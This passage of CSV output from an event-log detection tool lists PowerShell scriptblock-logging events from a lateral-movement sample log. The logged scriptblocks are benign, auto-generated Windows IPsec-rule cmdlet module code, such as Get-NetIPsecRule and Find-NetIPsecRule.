$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } 
catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] 
[switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { 
[object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } 
catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeli",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ne=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 